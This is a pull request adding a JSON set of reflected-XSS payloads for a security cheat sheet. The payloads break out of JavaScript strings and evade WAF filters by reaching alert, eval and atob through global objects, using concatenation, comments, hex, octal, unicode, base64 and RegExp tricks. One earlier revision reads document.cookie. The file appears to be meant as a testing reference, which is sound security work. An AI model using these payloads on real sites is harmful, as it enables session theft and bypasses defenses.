### PR TITLE
WAF bypass using JavaScript global object

### DIFF
--- a/json/waf_bypass_global_obj.json
+++ b/json/waf_bypass_global_obj.json
@@ -1,0 +1,46 @@
+[
+    {
+        "description": "Reflected XSS into a JavaScript string: self object and string concatenation",
+        "code": "';self['ale'+'rt'](self['doc'+'ument']['coo'+'kie']);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ],
+        "url": ""
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: self object and comment syntax",
+        "code": "';self[\/*foo*\/'alert'\/*bar*\/](self[\/*foo*\/'document'\/*bar*\/]['cookie']);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ],
+        "url": ""
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: self object and hex escape sequence",
+        "code": "';self['\\x61\\x6c\\x65\\x72\\x74'](self['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x63\\x6f\\x6f\\x6b\\x69\\x65']);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ],
+        "url": ""
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: self object, hex escape sequence and base64 encoded string",
+        "code": "';self['\\x65\\x76\\x61\\x6c'](self['\\x61\\x74\\x6f\\x62']('YWxlcnQoMSkK'));",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ],
+        "url": ""
+    }
+]

--- a/json/waf_bypass_global_obj.json
+++ b/json/waf_bypass_global_obj.json
@@ -1,46 +1,541 @@
 [
     {
-        "description": "Reflected XSS into a JavaScript string: self object and string concatenation",
-        "code": "';self['ale'+'rt'](self['doc'+'ument']['coo'+'kie']);\/\/",
+        "description": "Reflected XSS into a JavaScript string: string concatenation (window)",
+        "code": "';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;window[%27ale%27%2b%27rt%27](window[%27doc%27%2b%27ument%27][%27dom%27%2b%27ain%27]);\/\/",
         "browsers": [
             "chrome",
             "firefox",
             "edge",
             "safari"
-        ],
-        "url": ""
+        ]
     },
     {
-        "description": "Reflected XSS into a JavaScript string: self object and comment syntax",
-        "code": "';self[\/*foo*\/'alert'\/*bar*\/](self[\/*foo*\/'document'\/*bar*\/]['cookie']);\/\/",
+        "description": "Reflected XSS into a JavaScript string: string concatenation (self)",
+        "code": "';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;self[%27ale%27%2b%27rt%27](self[%27doc%27%2b%27ument%27][%27dom%27%2b%27ain%27]);\/\/",
         "browsers": [
             "chrome",
             "firefox",
             "edge",
             "safari"
-        ],
-        "url": ""
+        ]
     },
     {
-        "description": "Reflected XSS into a JavaScript string: self object and hex escape sequence",
-        "code": "';self['\\x61\\x6c\\x65\\x72\\x74'](self['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x63\\x6f\\x6f\\x6b\\x69\\x65']);\/\/",
+        "description": "Reflected XSS into a JavaScript string: string concatenation (this)",
+        "code": "';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;this[%27ale%27%2b%27rt%27](this[%27doc%27%2b%27ument%27][%27dom%27%2b%27ain%27]);\/\/",
         "browsers": [
             "chrome",
             "firefox",
             "edge",
             "safari"
-        ],
-        "url": ""
+        ]
     },
     {
-        "description": "Reflected XSS into a JavaScript string: self object, hex escape sequence and base64 encoded string",
-        "code": "';self['\\x65\\x76\\x61\\x6c'](self['\\x61\\x74\\x6f\\x62']('YWxlcnQoMSkK'));",
+        "description": "Reflected XSS into a JavaScript string: string concatenation (top)",
+        "code": "';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;top[%27ale%27%2b%27rt%27](top[%27doc%27%2b%27ument%27][%27dom%27%2b%27ain%27]);\/\/",
         "browsers": [
             "chrome",
             "firefox",
             "edge",
             "safari"
-        ],
-        "url": ""
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: string concatenation (parent)",
+        "code": "';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;parent[%27ale%27%2b%27rt%27](parent[%27doc%27%2b%27ument%27][%27dom%27%2b%27ain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: string concatenation (frames)",
+        "code": "';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;frames[%27ale%27%2b%27rt%27](frames[%27doc%27%2b%27ument%27][%27dom%27%2b%27ain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: string concatenation (globalThis)",
+        "code": "';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;globalThis[%27ale%27%2b%27rt%27](globalThis[%27doc%27%2b%27ument%27][%27dom%27%2b%27ain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: comment syntax (window)",
+        "code": "';window[\/*foo*\/'alert'\/*bar*\/](window[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;window[\/*foo*\/%27alert%27\/*bar*\/](window[\/*foo*\/%27document%27\/*bar*\/][%27domain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: comment syntax (self)",
+        "code": "';self[\/*foo*\/'alert'\/*bar*\/](self[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;self[\/*foo*\/%27alert%27\/*bar*\/](self[\/*foo*\/%27document%27\/*bar*\/][%27domain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: comment syntax (this)",
+        "code": "';this[\/*foo*\/'alert'\/*bar*\/](this[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;this[\/*foo*\/%27alert%27\/*bar*\/](this[\/*foo*\/%27document%27\/*bar*\/][%27domain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: comment syntax (top)",
+        "code": "';top[\/*foo*\/'alert'\/*bar*\/](top[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;top[\/*foo*\/%27alert%27\/*bar*\/](top[\/*foo*\/%27document%27\/*bar*\/][%27domain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: comment syntax (parent)",
+        "code": "';parent[\/*foo*\/'alert'\/*bar*\/](parent[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;parent[\/*foo*\/%27alert%27\/*bar*\/](parent[\/*foo*\/%27document%27\/*bar*\/][%27domain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: comment syntax (frames)",
+        "code": "';frames[\/*foo*\/'alert'\/*bar*\/](frames[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;frames[\/*foo*\/%27alert%27\/*bar*\/](frames[\/*foo*\/%27document%27\/*bar*\/][%27domain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: comment syntax (globalThis)",
+        "code": "';globalThis[\/*foo*\/'alert'\/*bar*\/](globalThis[\/*foo*\/'document'\/*bar*\/]['domain']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;globalThis[\/*foo*\/%27alert%27\/*bar*\/](globalThis[\/*foo*\/%27document%27\/*bar*\/][%27domain%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence (window)",
+        "code": "';window['\\x61\\x6c\\x65\\x72\\x74'](window['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;window[%27\\x61\\x6c\\x65\\x72\\x74%27](window[%27\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74%27][%27\\x64\\x6f\\x6d\\x61\\x69\\x6e%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence (self)",
+        "code": "';self['\\x61\\x6c\\x65\\x72\\x74'](self['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;self[%27\\x61\\x6c\\x65\\x72\\x74%27](self[%27\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74%27][%27\\x64\\x6f\\x6d\\x61\\x69\\x6e%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence (this)",
+        "code": "';this['\\x61\\x6c\\x65\\x72\\x74'](this['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;this[%27\\x61\\x6c\\x65\\x72\\x74%27](this[%27\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74%27][%27\\x64\\x6f\\x6d\\x61\\x69\\x6e%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence (top)",
+        "code": "';top['\\x61\\x6c\\x65\\x72\\x74'](top['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;top[%27\\x61\\x6c\\x65\\x72\\x74%27](top[%27\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74%27][%27\\x64\\x6f\\x6d\\x61\\x69\\x6e%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence (parent)",
+        "code": "';parent['\\x61\\x6c\\x65\\x72\\x74'](parent['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;parent[%27\\x61\\x6c\\x65\\x72\\x74%27](parent[%27\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74%27][%27\\x64\\x6f\\x6d\\x61\\x69\\x6e%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence (frames)",
+        "code": "';frames['\\x61\\x6c\\x65\\x72\\x74'](frames['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;frames[%27\\x61\\x6c\\x65\\x72\\x74%27](frames[%27\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74%27][%27\\x64\\x6f\\x6d\\x61\\x69\\x6e%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence (globalThis)",
+        "code": "';globalThis['\\x61\\x6c\\x65\\x72\\x74'](globalThis['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74']['\\x64\\x6f\\x6d\\x61\\x69\\x6e']);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;globalThis[%27\\x61\\x6c\\x65\\x72\\x74%27](globalThis[%27\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74%27][%27\\x64\\x6f\\x6d\\x61\\x69\\x6e%27]);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)",
+        "code": "';window['\\x65\\x76\\x61\\x6c']('window[\"\\x61\\x6c\\x65\\x72\\x74\"](window[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;window[%22\\x65\\x76\\x61\\x6c%22](%27window[%22\\x61\\x6c\\x65\\x72\\x74%22](window[%22\\x61\\x74\\x6f\\x62%22](%22WFNT%22))%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)",
+        "code": "';self['\\x65\\x76\\x61\\x6c']('self[\"\\x61\\x6c\\x65\\x72\\x74\"](self[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;self[%22\\x65\\x76\\x61\\x6c%22](%27self[%22\\x61\\x6c\\x65\\x72\\x74%22](self[%22\\x61\\x74\\x6f\\x62%22](%22WFNT%22))%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)",
+        "code": "';this['\\x65\\x76\\x61\\x6c']('this[\"\\x61\\x6c\\x65\\x72\\x74\"](this[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;this[%22\\x65\\x76\\x61\\x6c%22](%27this[%22\\x61\\x6c\\x65\\x72\\x74%22](this[%22\\x61\\x74\\x6f\\x62%22](%22WFNT%22))%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)",
+        "code": "';top['\\x65\\x76\\x61\\x6c']('top[\"\\x61\\x6c\\x65\\x72\\x74\"](top[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;top[%22\\x65\\x76\\x61\\x6c%22](%27top[%22\\x61\\x6c\\x65\\x72\\x74%22](top[%22\\x61\\x74\\x6f\\x62%22](%22WFNT%22))%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)",
+        "code": "';parent['\\x65\\x76\\x61\\x6c']('parent[\"\\x61\\x6c\\x65\\x72\\x74\"](parent[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;parent[%22\\x65\\x76\\x61\\x6c%22](%27parent[%22\\x61\\x6c\\x65\\x72\\x74%22](parent[%22\\x61\\x74\\x6f\\x62%22](%22WFNT%22))%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)",
+        "code": "';frames['\\x65\\x76\\x61\\x6c']('frames[\"\\x61\\x6c\\x65\\x72\\x74\"](frames[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;frames[%22\\x65\\x76\\x61\\x6c%22](%27frames[%22\\x61\\x6c\\x65\\x72\\x74%22](frames[%22\\x61\\x74\\x6f\\x62%22](%22WFNT%22))%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)",
+        "code": "';globalThis['\\x65\\x76\\x61\\x6c']('globalThis[\"\\x61\\x6c\\x65\\x72\\x74\"](globalThis[\"\\x61\\x74\\x6f\\x62\"](\"WFNT\"))');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;globalThis[%22\\x65\\x76\\x61\\x6c%22](%27globalThis[%22\\x61\\x6c\\x65\\x72\\x74%22](globalThis[%22\\x61\\x74\\x6f\\x62%22](%22WFNT%22))%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: octal escape sequence (window)",
+        "code": "';window['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;window[%27\\141\\154\\145\\162\\164%27](%27\\130\\123\\123%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: octal escape sequence (self)",
+        "code": "';self['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;self[%27\\141\\154\\145\\162\\164%27](%27\\130\\123\\123%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: octal escape sequence (this)",
+        "code": "';this['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;this[%27\\141\\154\\145\\162\\164%27](%27\\130\\123\\123%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: octal escape sequence (top)",
+        "code": "';top['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;top[%27\\141\\154\\145\\162\\164%27](%27\\130\\123\\123%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: octal escape sequence (parent)",
+        "code": "';parent['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;parent[%27\\141\\154\\145\\162\\164%27](%27\\130\\123\\123%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: octal escape sequence (frames)",
+        "code": "';frames['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;frames[%27\\141\\154\\145\\162\\164%27](%27\\130\\123\\123%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: octal escape sequence (globalThis)",
+        "code": "';globalThis['\\141\\154\\145\\162\\164']('\\130\\123\\123');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;globalThis[%27\\141\\154\\145\\162\\164%27](%27\\130\\123\\123%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: unicode escape (window)",
+        "code": "';window['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;window[%27\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}%27](%27\\u{0058}\\u{0053}\\u{0053}%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: unicode escape (self)",
+        "code": "';self['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;self[%27\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}%27](%27\\u{0058}\\u{0053}\\u{0053}%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: unicode escape (this)",
+        "code": "';this['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;this[%27\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}%27](%27\\u{0058}\\u{0053}\\u{0053}%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: unicode escape (top)",
+        "code": "';top['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;top[%27\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}%27](%27\\u{0058}\\u{0053}\\u{0053}%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: unicode escape (parent)",
+        "code": "';parent['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;parent[%27\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}%27](%27\\u{0058}\\u{0053}\\u{0053}%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: unicode escape (frames)",
+        "code": "';frames['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;frames[%27\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}%27](%27\\u{0058}\\u{0053}\\u{0053}%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: unicode escape (globalThis)",
+        "code": "';globalThis['\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}']('\\u{0058}\\u{0053}\\u{0053}');\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;globalThis[%27\\u{0061}\\u{006c}\\u{0065}\\u{0072}\\u{0074}%27](%27\\u{0058}\\u{0053}\\u{0053}%27);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: RegExp source property (window)",
+        "code": "';window[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;window[\/al\/.source%2b\/ert\/.source](\/XSS\/.source);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: RegExp source property (self)",
+        "code": "';self[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;self[\/al\/.source%2b\/ert\/.source](\/XSS\/.source);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: RegExp source property (this)",
+        "code": "';this[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;this[\/al\/.source%2b\/ert\/.source](\/XSS\/.source);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: RegExp source property (top)",
+        "code": "';top[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;top[\/al\/.source%2b\/ert\/.source](\/XSS\/.source);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: RegExp source property (parent)",
+        "code": "';parent[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;parent[\/al\/.source%2b\/ert\/.source](\/XSS\/.source);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: RegExp source property (frames)",
+        "code": "';frames[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;frames[\/al\/.source%2b\/ert\/.source](\/XSS\/.source);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
+    },
+    {
+        "description": "Reflected XSS into a JavaScript string: RegExp source property (globalThis)",
+        "code": "';globalThis[\/al\/.source+\/ert\/.source](\/XSS\/.source);\/\/",
+        "url": "http:\/\/portswigger-labs.net\/xss\/xss.php?context=js_string_single&x=%27;globalThis[\/al\/.source%2b\/ert\/.source](\/XSS\/.source);\/\/",
+        "browsers": [
+            "chrome",
+            "firefox",
+            "edge",
+            "safari"
+        ]
     }
 ]


### PR DESCRIPTION
Hi,

I don't know if this could be interesting for the XSS cheat sheet but I see that a WAF bypass section is missing. This PR includes some of my tests (you can go deep here https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) on bypassing rule set using JavaScript global object on a "Reflected XSS into a JavaScript string".

In all payloads I used the `self` object but, based on my tests, it could be used one of the following:
- window
- self
- ~_self~
- this
- top
- parent
- frames

I left the "url" parameter empty. It would be nice to have a "Reflected XSS into a JavaScript string" vulnerability on the http://portswigger-labs.net/xss/xss.php lab to properly set the "url" parameter.
